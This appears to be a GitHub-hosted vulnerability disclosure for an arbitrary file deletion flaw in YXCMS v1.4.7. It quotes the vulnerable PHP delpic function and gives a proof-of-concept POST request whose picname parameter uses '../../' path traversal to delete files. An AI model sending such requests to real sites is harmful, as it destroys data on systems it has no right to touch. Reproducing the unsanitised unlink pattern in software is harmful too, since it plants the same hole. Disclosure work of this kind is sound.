Skip to content
Permalink
master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time
There is Any File Deletion vulnerablity YXCMS v1.4.7
Description:
An issue was discovered in YXCMS v1.4.7
Any File Deletion vulnerability in /yxcms1.4.7/protected/apps/admin/controller/photoController.php
Condition:
You should be a Administrator(Obtain passwords and accounts via weak passwords or social engineering)
The Cause of the vulnerability:
There is a bug function in line 355th of this script, as shown in the following code:
public function delpic()
{
echo $this->uploadpath;
if(empty($_POST['picname'])) $this->error('参数错误~');
$picname=$_POST['picname'];
$path=$this->uploadpath;
if(file_exists($path.$picname))
@unlink($path.$picname); //focus
else{echo '图片不存在~';return;}
if(file_exists($path.'thumb_'.$picname))
@unlink($path.'thumb_'.$picname);
else {echo '缩略图不存在~';return;}
echo '原图以及缩略图删除成功~';
}
POC(Burpsuite data package display):
First visit the link http://127.0.0.1/yxcms1.4.7/index.php?r=admin/photo/edit&id=10
Then randomly select a picture, click delete and capture data packet to modify
POST /yxcms1.4.7/index.php?r=admin/photo/delpic HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/yxcms1.4.7/index.php?r=admin/photo/edit&id=10
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 34
Cookie: PHPSESSID=b4hknkakpn3ke0aa18ct6itck5
Connection: close
picname=../../test.txt //The parameter is replaced with any file you want to delete